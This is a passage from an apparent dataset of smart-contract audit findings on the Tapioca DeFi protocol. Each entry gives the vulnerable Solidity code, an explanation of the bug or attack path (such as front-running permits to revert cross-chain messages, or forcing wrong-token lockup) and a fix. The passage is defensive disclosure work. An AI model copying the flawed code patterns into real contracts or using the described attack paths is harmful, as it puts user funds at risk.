_options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n\\nThe issue here is that, the computed amount to send, is never updated in the `lsSendParams.sendParam`, the current code still goes on to send the packet to the destination chain with the default input amount:\\n```\\n if (msg_.withdrawOnOtherChain) {\\n /// @dev determine the right amount to send back to source\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n\\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from);\\n\\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n```\\n\\nTo Illustrate:\\nassuming send `amountLD` = 100 and the user is to receive a tap amount of = 80 since `amountLD` is greater than tap amount, the amount to send should be 80, i.e. `msg_.lzSendParams.sendParam.amountLD` = 80 The current code goes on to send the default 100 to the user, when the user is only entitled to 80",update the lz send param `amountLD` to the new computed `amountToSend` before sending the packet\\nI.e :\\n```\\nmsg_.lzSendParams.sendParam.amountLD = amountToSend;\\n```\\n\\nNote that the issue should also be fixed in Tapioca-Bar as well,The user will always receive an incorrect amount of `tapOFT` in the desired chain whenever `amountLD` is greater than `tapAmount`,```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? 
_options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n +Underflow Vulnerability in `Market::_allowedBorrow` Function: Oversight with Pearlmit Allowance Handling,medium,"The protocol permits users to authorize spenders using the MarketERC20::approveBorrow function, and also includes support for allowances granted through the `Pearlmit` contract. However, an oversight in the _allowedBorrow function leads to an underflow issue when spenders utilize `Pearlmit` allowances, rendering them unable to execute borrowing actions despite having the necessary permission.\\nProtocol users can approve a spender via MarketERC20::approveBorrow function, to perform certain actions like `borrow`, `repay` or adding of collateral on their behalf. Whenever the spender calls any of these functionalities, down the execution _allowedBorrow is invoked to check if the caller is allowed to `borrow` `share` `from` `from`, and then decrease the spender's allowance by the `share` amount.\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nThe problem here is, _allowedBorrow will always revert due to an underflow whenever the spender is given an allowance in the `Pearlmit` contract.\\nTo Illustrate\\nAssuming we have two users, Bob and Alice, since `Pearlmit` allowance is also accepted, Alice grants Bob a borrowing allowance of `100` tokens for the collateral id using `Pearlmit`. 
Note that Bob's allowance in the Market contract for Alice will be `zero(0)` and `100` in `Pearlmit`.\\nWhen Bob tries to borrow an amount equal to his `Pearlmit` allowance, down the borrow logic `_allowedBorrow` is called, in `_allowedBorrow` function, the below requirement passes, since the returned `pearlmitAllowed` for Bob will equal `100` shares\\n```\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n```\\n\\nRemember Bob's allowance in the Market contract for Alice is `0`, but `100` in `Pearlmit`, but _allowedBorrow function erroneously attempts to deduct the share from Bob's Market allowance, which will thus result in an underflow revert(0 - 100).\\n```\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n```\\n","After ensuring that the user has got the approval, return when permission from `Pearlmit` is used:\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n+ if (pearlmitAllowed != 0) return;\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nOr remove support for `Pearlmit` allowance","Although giving a spender allowance via `Pearlmit` will appear to be supported, the spender cannot carry out any borrowing action in the Market.","```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n 
require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n" +The repaying action in `BBLeverage.sellCollateral` function pulls YieldBox shares of asset from wrong address,medium,"The `sellCollateral` function is used to sell a user's collateral to obtain YieldBox shares of the asset and repay the user's loan. However, in the BBLeverage contract, it calls `_repay` with the `from` parameter set to the user, even though the asset shares have already been collected by this contract beforehand.\\nIn `BBLeverage.sellCollateral`, the `from` variable (user) is used as the repayer address.\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n\\nTherefore, asset shares of user will be pulled in `BBLendingCommon._repay` function.\\n```\\nfunction _repay(address from, address to, uint256 part) internal returns (uint256 amount) {\\n // rest of code\\n // @dev amount includes the opening & accrued fees\\n yieldBox.withdraw(assetId, from, address(this), amount, 0);\\n // rest of code\\n```\\n\\nThis is incorrect behavior since the necessary asset shares were already collected by the contract in the `BBLeverage.sellCollateral` function. 
The repayer address should be `address(this)` for `_repay`.","Should fix as following:\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(address(this), from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(address(this), from, partOut);\\n}\\n```\\n",Mistakenly pulling user funds while the received asset shares remain stuck in the contract will result in losses for users who have sufficient allowance and balance when using the `BBLeverage.sellCollateral` functionality.,"```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n" +`leverageAmount` is incorrect in `SGLLeverage.sellCollateral` function due to calculation based on the new states of YieldBox after withdrawal,medium,"See vulnerability detail\\n`SGLLeverage.sellCollateral` function attempts to remove the user's collateral in shares of YieldBox, then withdraws those collateral shares to collect collateral tokens. Subsequently, the received collateral tokens can be used to swap for asset tokens.\\nHowever, the `leverageAmount` variable in this function does not represent the actual withdrawn tokens from the provided shares because it is calculated after the withdrawal.\\n```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n\\n`yieldBox.toAmount` after withdrawal may return different from the actual withdrawn token amount, because the states of YieldBox has changed. 
Because the token amount is calculated with rounding down in YieldBox, `leverageAmount` will be higher than the actual withdrawn amount.\\nFor example, before the withdrawal, YieldBox had 100 total shares and 109 total tokens. Now this function attempt to withdraw 10 shares (calldata_.share = 10) -> the actual withdrawn amount = 10 * 109 / 100 = 10 tokens After that, leverageAmount will be calculated based on the new yieldBox's total shares and total tokens -> leverageAmount = 10 * (109 - 10) / (100 - 10) = 11 tokens\\nThe same vulnerability exists in `BBLeverage.sellCollateral` function.","`leverageAmount` should be obtained from the return value of YieldBox.withdraw:\\n```\\n(uint256 leverageAmount, ) = yieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\n```\\n","Because `leverageAmount` can be higher than the actual withdrawn collateral tokens, `leverageExecutor.getAsset()` will revert due to not having enough tokens in the contract to pull. 
This results in a DOS of `sellCollateral`, breaking this functionality.","```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n" +mTOFTReceiver MSG_XCHAIN_LEND_XCHAIN_LOCK unable to execute,medium,"In `mTOFTReceiver._toftCustomComposeReceiver(uint16 _msgType)` If `_msgType` is processed normally, the method must return `true`, if it returns `false`, it will trigger `revert InvalidMsgType()` But when `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` is executed normally, it does not correctly return `true` This causes this type of execution to always fail\\nThe main execution order of `_lzCompose()` is as follows:\\nIf msgType_ == MSG_REMOTE_TRANSFER, execute `_remoteTransferReceiver()`\\nOtherwise, execute `_extExec(msgType_, tapComposeMsg_)`\\nOtherwise, execute `tapiocaOmnichainReceiveExtender`\\nOtherwise, execute `_toeComposeReceiver()`\\nIf the 4th step `_toeComposeReceiver()` returns false, it is considered that the type cannot be found, and `revert InvalidMsgType(msgType_);` is triggered\\nthe code as follows:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. 
If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n\\nThe implementation of `mTOFTReceiver._toeComposeReceiver()` is as follows:\\n```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n //@audit miss return true\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n\\nAs mentioned above, because `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` does not return `true`, it always triggers `revert InvalidMsgType(msgType_);`","```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) 
BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n// Add the line below\\n return true;\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n",`_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` `TOFTOptionsReceiver.mintLendXChainSGLXChainLockAndParticipateReceiver()` unable to execute successfully,"```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. 
If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n" +Multiple contracts cannot be paused,medium,"For safety, tapioca has added `whenNotPaused` restrictions to multiple contracts But there is no method provided to modify the `_paused` state If a security event occurs, it cannot be paused at all\\nTake `mTOFT.sol` as an example, multiple methods are `whenNotPaused`\\n```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n\\nBut the contract does not provide a `public` method to modify `_paused` Note: `Pausable.sol` does not have a `public` method to modify `_paused`\\nIn reality, there have been multiple reports of security incidents where the protocol side wants to pause to prevent losses, but cannot pause, strongly recommend adding\\nNote: The following contracts cannot be paused\\nmTOFT\\nTOFT\\nUsdo\\nAssetToSGLPLeverageExecutor",```\\n// Add the line below\\n function pause() external 
onlyOwner{\\n// Add the line below\\n _pause();\\n// Add the line below\\n }\\n\\n// Add the line below\\n function unpause() external onlyOwner{\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\n,"Due to the inability to modify `_paused`, it poses a security risk","```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n" +Composing approval with other messages is subject to DoS,medium,"`TOFT::sendPacket` function allows the caller to specify multiple messages that are executed on the destination chain. On the receiving side the `lzCompose` function in `TOFT` contract can be DoS-ed by front-running the approval message and causing the `lzCompose` to revert. As `lzCompose` is supposed to process several messages, this results in lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract.\\n`TOFT::sendPacket` allows the caller to specify arbitrary `_composeMsg`. 
It can be a single message or multiple composed messages.\\n```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n\\nIf we observe the logic inside the lzCompose:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. 
If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n\\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAt the beginning of the function bytes memory `tapComposeMsg_` is the message being processed, while `bytes memory nextMsg_` are all the other messages. `lzCompose` will process all the messages until `nextMsg_` is empty.\\nA user might want to have his first message to grant approval, e.g. `_extExec` function call, while his second message might execute `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW`.\\nThis is a problem as there is a clear DoS attack vector on granting any approvals. A griefer can observe the permit message from the user and front-run the `lzCompose` call and submit the approval on the user's behalf.\\nAs permits use nonce it can't be replayed, which means if anyone front-runs the permit, the original permit will revert. 
This means that `lzCompose` always reverts and all the gas and value to process the `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW` is lost for the user.","`TOFT::sendPacket` should do extra checks to ensure if the message contains approvals, it should not allow packing several messages.","When user is granting approvals and wants to execute any other message in the same `lzCompose` call, the attacker can deny the user from executing the other message by front-running the approval message and causing the `lzCompose` to revert. The impact is lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract. This is especially severe when the user wants to withdraw funds to another chain, as he needs to pay for that fee on the sending chain.","```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n" +StargateRouter cannot send payloads and rebalancing of ERC20s is broken,medium,"The `Balancer.sol` contract can't perform the rebalancing of ERC20s across chains as the Stargate router is not able to send any payload and will immediately revert the transaction if a payload is included. In this instance payload is hardcoded to `""0x""`.\\n`Balancer.sol` contract has a `rebalance` function that is supposed to perform a rebalancing of `mTOFTs` across chains. In case the token being transferred through Stargate is an ERC20 it is using the Stargate router to initiate the transfer. 
The issue however is that the stargate router is not able to send any payload and will immediately revert the transaction if a payload is included.\\nIf we take a look at the code, there is a payload equal to ""0x"" being sent with the transaction:\\n```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x"" => this is the payload that is being sent with the transaction\\n );\\n```\\n\\nAs a proof of concept we can try to send a payload through the stargate router on a forked network and see that the transaction will revert. p.s. make sure to run on it on a forked network on Ethereum mainnet.\\n```\\nfunction testStargateRouterReverting() public {\\n vm.createSelectFork(vm.envString(""MAINNET_RPC_URL""));\\n \\n address stargateRouter = 0x8731d54E9D02c286767d56ac03e8037C07e01e98;\\n address DAIWhale = 0x7A8EDc710dDEAdDDB0B539DE83F3a306A621E823;\\n address DAI = 0x6B175474E89094C44Da98b954EedeAC495271d0F;\\n IStargateRouter.lzTxObj memory lzTxParams = IStargateRouter.lzTxObj(0, 0, ""0x00"");\\n\\n vm.startPrank(DAIWhale);\\n vm.deal(DAIWhale, 5 ether);\\n IERC20(DAI).approve(stargateRouter, 1e18);\\n IStargateRouter(stargateRouter).swap{value: 1 ether}(\\n 111, 3, 3, payable(address(this)), 1e18, 1, lzTxParams, abi.encode(address(this)), ""0x""\\n );\\n}\\n```\\n\\nIt fails with the following error:\\nBoth `StargateRouter` and StargateComposer have the `swap` interface, but the intention was to use the `StargateRouter` which can be observed by the `retryRevert` function in the `Balancer.sol` contract.\\n```\\n## Balancer.sol\\n\\nfunction retryRevert(uint16 _srcChainId, bytes calldata _srcAddress, uint256 _nonce) external payable onlyOwner {\\n router.retryRevert{value: msg.value}(_srcChainId, _srcAddress, _nonce);\\n}\\n```\\n\\nAs this 
makes the rebalancing of `mTOFTs` broken, I'm marking this as a high-severity issue.",Use the `StargateComposer` instead of the `StargateRouter` if sending payloads.,"Rebalancing of `mTOFTs` across chains is broken and as it is one of the main functionalities of the protocol, this is a high-severity issue.","```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x"" => this is the payload that is being sent with the transaction\\n );\\n```\\n" +`mTOFT` can be forced to receive the wrong ERC20 leading to token lockup,medium,"Due to Stargate's functionality of swapping one token on the source chain to another token on the destination chain, it is possible to force `mTOFT` to receive the wrong ERC20 token leading to token lockup.\\nTo give an example, a user can:\\nProvide USDC on Ethereum and receive USDT on Avalanche.\\nProvide USDC on Avalanche and receive USDT on Arbitrum.\\netc.\\nThe issue here is that poolIds are not enforced during the rebalancing process. 
As it can be observed the `bytes memory _ercData` is not checked for its content.\\n```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n\\nIt is simply decoded and passed as is.\\nThis is a problem and imagine the following scenario:\\nA Gelato bot calls the rebalance method for `mTOFT` that has USDC as erc20 on Ethereum.\\nThe bot encodes the `ercData` so `srcChainId = 1` pointing to USDC but `dstChainId = 2` pointing to USDT on Avalanche.\\nDestination `mTOFT` is fetched from `connectedOFTs` and points to the `mTOFT` with USDC as erc20 on Avalanche.\\nStargate will take USDC on Ethereum and provide USDT on Avalanche.\\n`mTOFT` with USDC as underlying erc20 on Avalanche will receive USDT token and it will remain lost as the balance of the `mTOFT` contract.\\nAs this is a clear path for locking up wrong tokens inside the `mTOFT` contract, it is a critical issue.","The `initConnectedOFT` function should enforce the poolIds for the src and dst chains.The rebalance function should just fetch these saved values and use them.\\n```\\n \\n@@ // Remove the line below\\n164,14 // Add the line below\\n176,12 @@ contract Balancer is Ownable {\\n * @param _dstChainId the destination LayerZero id\\n * @param _slippage the destination LayerZero id\\n * @param _amount the rebalanced amount\\n// Remove the line below\\n * @param _ercData custom send data\\n */\\n function rebalance(\\n address payable _srcOft,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n// Remove the line below\\n uint256 _amount,\\n// Remove the line below\\n 
bytes memory _ercData\\n// Add the line below\\n uint256 _amount\\n ) external payable onlyValidDestination(_srcOft, _dstChainId) onlyValidSlippage(_slippage) {\\n {\\n@@ // Remove the line below\\n188,13 // Add the line below\\n204,13 @@ contract Balancer is Ownable {\\n if (msg.value == 0) revert FeeAmountNotSet();\\n if (_isNative) {\\n if (disableEth) revert SwapNotEnabled();\\n _sendNative(_srcOft, _amount, _dstChainId, _slippage);\\n } else {\\n// Remove the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage, _ercData);\\n// Add the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage);\\n }\\n\\n \\n@@ // Remove the line below\\n221,7 // Add the line below\\n237,7 @@ contract Balancer is Ownable {\\n * @param _dstOft the destination TOFT address\\n * @param _ercData custom send data\\n */\\n// Remove the line below\\n function initConnectedOFT(address _srcOft, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n// Add the line below\\n function initConnectedOFT(address _srcOft, uint256 poolId, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n external\\n onlyOwner\\n {\\n@@ // Remove the line below\\n231,10 // Add the line below\\n247,8 @@ contract Balancer is Ownable {\\n bool isNative = ITOFT(_srcOft).erc20() == address(0);\\n if (!isNative && _ercData.length == 0) revert PoolInfoRequired();\\n \\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_ercData, (uint256, uint256));\\n// Remove the line below\\n\\n OFTData memory oftData =\\n// Remove the line below\\n OFTData({srcPoolId: _srcPoolId, dstPoolId: _dstPoolId, dstOft: _dstOft, rebalanceable: 0});\\n// Add the line below\\n OFTData({srcPoolId: poolId, dstPoolId: poolId, dstOft: _dstOft, rebalanceable: 0});\\n \\n connectedOFTs[_srcOft][_dstChainId] = oftData;\\n emit ConnectedChainUpdated(_srcOft, _dstChainId, _dstOft);\\n \\n function _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n// 
Remove the line below\\n uint256 _slippage,\\n// Remove the line below\\n bytes memory _data\\n// Add the line below\\n uint256 _slippage\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n// Remove the line below\\n }\\n// Add the line below\\n }\\n {\\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n// Remove the line below\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n// Add the line below\\n _routerSwap(_dstChainId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n \\n function _routerSwap(\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _srcPoolId,\\n// Remove the line below\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n// Add the line below\\n uint256 poolId = connectedOFTs[_oft][_dstChainId].srcPoolId;\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n// Remove the line below\\n _srcPoolId,\\n// Remove the line below\\n _dstPoolId,\\n// Add the line below\\n poolId,\\n// Add the line below\\n poolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n```\\n\\nAdmin is trusted but you can optionally add additional checks inside the `initConnectedOFT` function to ensure that the poolIds are correct for the src and dst mTOFTs.",The impact of this vulnerability is critical. 
